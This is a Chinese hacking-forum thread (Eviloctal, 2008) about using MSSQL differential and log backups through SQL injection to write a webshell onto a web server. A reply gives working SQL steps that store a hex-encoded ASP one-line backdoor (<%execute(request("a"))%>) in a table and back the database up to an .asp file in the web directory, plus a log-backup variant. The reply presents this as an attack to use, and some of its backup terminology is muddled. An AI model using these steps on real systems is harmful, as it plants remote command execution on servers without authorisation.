[讨论]我对增量备份与LOG备份的四点疑惑
[讨论]我对增量备份与LOG备份的四点疑惑信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
议题作者:hackwind
我对增量备份和LOG备份一直存有疑惑。主要有下面几点、
1.我们常说差异备份,请问这指的是什么?是两种备份的总称还是仅仅增量备份?
2.NBSI3种自带的getwebshell的备份是什么备份?为什么它提示“如果是备份LOG,请先执行:
alter database XXX set RECOVERY FULL”。那么我们不执行这个进行的是增量备份吗?不执行貌似进行的也是LOG备份啊,里面有LOG字样。还有如果执行这么执行。在注入点后手工加;alter database XXX set RECOVERY FULL吗?
3.权限问题。在《精通脚本黑客》里说备份是PUBLIC唯一可以写入shell的方法。但网上有人说正常情况下是不能呢个LOG备份的,首先要修改一下属性(故障还原模式),语句正是LOG备份的第一句话;alter database XXXX set RECOVERY FULL
4.如果getwebshell用的是LOG备份,现在好多版本的都省略了一步,请问省略的是哪一步?
谢谢。
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=146932]0[/url] 积分39 阅读权限40 性别男 来自幽谷客 在线时间25 小时 注册时间2007-11-4 最后登录2008-6-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=146932]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32440&repquote=139715&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32440&pid=139715&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-16052.html]remax[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 public也可以备份?
are u kidding me?20字节够写什么?
[url=http://wpa.qq.com/msgrd?V=1&Uin=37424654&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子325 精华[url=http://forum.eviloctal.com/digest.php?authorid=16052]2[/url] 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 [url=http://www.remaxz.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=16052]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32440&repquote=140058&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32440&pid=140058&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-1799.html]撕碎了的小C[/url] [img]http://forum.eviloctal.com/customavatars/1799.gif[/img]
技术核心组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level2.gif[/img] 楼主对差异备份与LOG备份的概念不清楚,这里具体讲一下。
差异备份是针对完全备份:备份上一次的完全备份后发生变化的所有文件
增量备份就是LOG备份,它是针对于上一次备份(无论是哪种备份):备份上一次备份后,所有发生变化的文件。
对于差异备份来说,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,这样插入数据得以执行的概率也大大增加,得到webShell的成功自然也会提高了不少。其主要SQL语句为:
1首先完整备份一次(c:\ddd.bak为所备份未见)
backup database 库名 to disk = 'c:\ddd.bak';--
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容:<%execute(request("a"))%>
而LOG备份需要先把指定的数据库激活为还原模式,所以需要执行alter database XXX set RECOVERY FUL,而差异备份不需要,所以只有这条语句的就是LOG备份。它的基本步骤如下:
alter database XXXX set RECOVERY FULL
backup log XXXX to disk = 'c:\Sammy' with init
create table cmd (a image)
insert into cmd (a) values ('')
backup log XXXX to disk = 'c:\xxx\2.asp'
它只比差异备份多了一句SQL语句,就是那个激活的语句,但很多是时候LOG备份产生的文件更小,所以我们一般选择LOG备份。我是金子,我要闪光的....!
帖子128 精华[url=http://forum.eviloctal.com/digest.php?authorid=1799]4[/url] 积分3748 阅读权限200 性别男 来自湖南 在线时间124 小时 注册时间2005-1-28 最后登录2008-7-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1799]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32440&repquote=140074&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32440&pid=140074&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-146932.html]hackwind[/url] [img]http://forum.eviloctal.com/images/avatars/01.gif[/img]
晶莹剔透§烈日灼然
页:
[1]